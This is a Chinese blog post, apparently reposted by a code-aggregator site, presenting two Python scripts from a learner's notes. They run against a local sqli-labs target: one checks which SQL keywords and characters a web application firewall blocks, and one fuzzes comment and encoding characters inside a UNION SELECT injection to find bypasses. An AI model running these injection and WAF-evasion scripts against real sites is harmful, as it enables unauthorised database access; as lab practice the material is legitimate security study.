python学习之路day6

概述关于waf的简单脚本1，检测屏蔽哪些字符。2，fuzz批量测试1importrequestssql_char=['select','union','and','or','','selectunion','sleep','like','group','order',&#03 关于waf的简单脚本 1，检测屏蔽哪些字符。2，fuzz批量测试1

import requestssql_char = ['select', 'union', 'and', 'or', '', 'select union', 'sleep', 'like', 'group', 'order', 'by', 'ascii',            'updatexml', 'handler', 'insert', '\', '\ ', '@', 'all', '#', '-', '"', ')', '--', '+', '=', '/',' ']url = "http://192.168.126.132:5001/sqli/less-1/index,PHP/"header = {    'Host': '192.168.126.132:5001',    'User-Agent': 'Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 firefox/79.0',    'Accept': 'text/HTML,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',    'Accept-EnCoding': 'gzip, deflate',    'Content-Type': 'application/x-www-form-urlencoded'}for char in sql_char:    post_data = "query=test" + char + "&submit2=sbumit"    res = requests.post(url, data=post_data, headers=header)    if 'Illegal Char' in res.text:        print("过滤字符: {0}".format(char))    else:        print("通过: {0}".format(char))

2

import requestsfuzz_a = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00','%0a','%23','%20']fuzz_b = ['',' ']fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0g','%0h','%0i','%0j','%0h']FUZZ = fuzz_a + fuzz_b + fuzz_cdef work(url):    for a in FUZZ:        for b in FUZZ:            for c in FUZZ:                exp = url + "%27%20union" + "--%20asdasd" + a + b + c + "select" + "%201,2,3%20%23"                response = requests.get(url=exp).content                if "waf" in str(response) or "error" in str(response):                    pass                else:                    print(exp)if __name__ == '__main__':    url = "http://192.168.126.132:5001/sqli/Less-1/index.PHP?ID=-1"    work(url)

总结

以上是内存溢出为你收集整理的python学习之路day6全部内容，希望文章能够帮你解决python学习之路day6所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。